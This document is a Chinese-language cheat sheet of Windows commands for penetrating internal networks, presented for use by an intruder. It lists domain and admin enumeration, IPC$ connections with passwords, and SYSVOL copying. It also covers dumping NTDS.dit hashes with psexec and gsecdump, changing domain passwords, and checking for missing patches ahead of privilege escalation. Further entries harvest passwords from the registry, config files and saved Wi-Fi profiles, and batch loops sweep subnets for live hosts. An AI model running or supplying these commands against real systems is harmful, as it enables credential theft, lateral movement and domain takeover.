Windows下內網滲透常用命令總結

域內信息收集常用命令

net group /domain //獲得所有域用戶組列表

net group zzh /domain //顯示域中zzh組的成員

net group zzh /del /domain //刪除域中zzh組

net group zzh andy /del /domain //刪除域內zzh 群組中的成員

andy net group zzh /add /domain //增加zzh域中的群組

net group "domain admins" /domain //獲得域管理員列表

net group "enterprise admins" /domain //獲得企業管理員列表

net localgroup administrators /domain //獲取域內置administrators組用

（enterprise admins、domain admins） net group "domain controllers" /domain //獲得域控制器列表

net group "domain computers" /domain //獲得所有域成員計算機列表

net user /domain //獲得所有域用戶列表

net user someuser /domain //獲得指定賬戶someuser的詳細信息

net accounts /domain //獲得域密碼策略設置，密碼長短，錯誤鎖定等信息

net view /domain //查詢有幾個域, 查詢域列表

net view /domain:testdomain //查看 testdomain域中的計算機列表

nltest /domain_trusts //獲取域信任信息

net user domain-admin /domain //查看管理員登陸時間，密碼過期時間，是否有登陸腳本，組分配等信息

net config Workstation //查詢機器屬於哪個域

net time /domian //查詢主域服務器的時間

echo %logonserver% //查看登陸到這台服務器的計算機名

net time \\192.168.50.1 //查詢遠程共享主機192.168.50.1的時間

net use \\IP\ipc$ password /user:username@domain //ipc$域內連接，拿下文服的時候，可以結合菜刀去建立ipc連接，然后下載和閱讀想要的文件

net view \\dc1.zzhsec.com //查看域控共享情況

dir \\dc1.zzhsec.com\SYSVOL /s /a > sysvol.txt //列出sysvol日志記錄

xcopy \\dc1.zzhsec.com\sysvol.txt sysvol.txt /i /e /c //遠程拷貝到本地sysvol日志

net user /domain zzh 123.qwe //修改域內用戶密碼，需要管理員權限

mstsc /admin //遠程桌面登錄到console會話解決hash無法抓出問題

gpupdate/force //更新域策略

psexec \\192.168.50.3 -u administrator -p zzh1234 -c gsecdump.exe -u //從域服務器密碼存儲文件windows/ntds/ntds.dit導出hash值出來

gsecdump -a //獲取域登管理員登錄過得hash值，這里gescdump為第三方導出AD域的hash值

tasklist /S ip /U domain\username /P /V //查看遠程計算機進程列

基本操作常用命令

ipconfig/all //查看IP地址

ipconfig /release //釋放地址

ipconfig /renew 重新獲取Ip地址

whoami //查詢賬號所屬權限

systeminfo //查詢系統以及補丁信息

tasklist /svc //查看進程

taskkill /im 進程名稱

(cmd) //結束進程

taskkill /pid[進程碼] -t(結束該進程) -f(強制結束該進程以及所有子進程)

wmic qfe get hotfixid //查看已安裝過得補丁，這個很實用

wmic qfe list full /format:htable > hotfixes.htm //詳細的補丁安裝

wmic qfe //查詢補丁信息以及微軟提供的下載地址 ping hostname(主機名） //顯示該機器名的IP

query user //查看管理員最近登陸時間

net start //查看當前運行的服務

net user //查看本地組的用戶

net localhroup administrators //查看本機管理員組有哪些用戶

net use //查看會話

net session //查看當前會話

net share //查看SMB指向的路徑[即共享]

wmic share get name,path //查看SMB指向的路徑

wmic nteventlog get path,filename,writeable //查詢系統日志文件存儲位置

net use \\IP\ipc$ password /user:username //建立IPC會話（工作組模式）

net use z: \\192.168.50.1 //建立映射到本機Z盤

netstat -ano //查看開放的端口

netstat -an | find “3389” //找到3389端口

net accounts //查看本地密碼策略

nbtstat –A ip //netbiso查詢

net view //查看機器注釋或許能得到當前活動狀態的機器列表，如果禁用netbios就查看不出來

echo %PROCESSOR_ARCHITECTURE% //查看系統是32還是64位 set //查看系統環境設置變量 net start //查看當前運行的服務

wmic service list brief //查看進程服務

wmic process list brief //查看進程

wmic startup list brief //查看啟動程序信息

wmic product list brief //查看安裝程序和版本信息（漏洞利用線索）

wmic startup list full //識別開機啟動的程序

wmic process where(description="mysqld.exe") >> mysql.log //獲取軟件安裝路徑

qwinsta //查看登錄情況

windows未打補丁情況，

set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280) do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f /q /a a.txt //windows未打補丁情況，

為提權做准備 REG query HKCU /v "pwd" /s //獲取保存到注冊表中的密碼

探索內網網絡結構命令

tracert IP //路由跟蹤

 route print //打印路由表

arp -a //列出本網段內所有活躍的IP地址

arp -s （ip + MAC）//綁定mac與ip地址

arp -d （ip + MAC） //解綁mac與ip地址

nbtscan -r 192.168.16.0/24 //通過小工具nbtscan掃描整個網絡

netsh firewall show config //查看防火牆策略

netsh firewall show state //查看防火牆策略

查找文件位置命令

dir /b/s config.* //查看所在目錄所有config.為前綴的文件

dir /b/s *.config //查看所在目錄所有config.為后綴的文件

findstr /si password *.xml *.ini *.txt //查看后綴名文件中含有password關鍵字的文件

findstr /si login *.xml *.ini *.txt //查看后綴名文件中含有login關鍵字的文件

copy con ftp.bat //創建ftp.bat批處理，然后輸入ifconfig等命令，按ctr+z退出，並創建成功 copy con test.vbs //創建test.vbs腳本，輸入腳本后，按ctr+z退出，並創建成功

內網探測小腳本

//一鍵獲取wifi密碼    for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

//查看是否支持posershell if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)

//批量掃描內網存活主機 for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"

//域機器對應 IP FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

//C段查找 for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"

//B段查找 for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"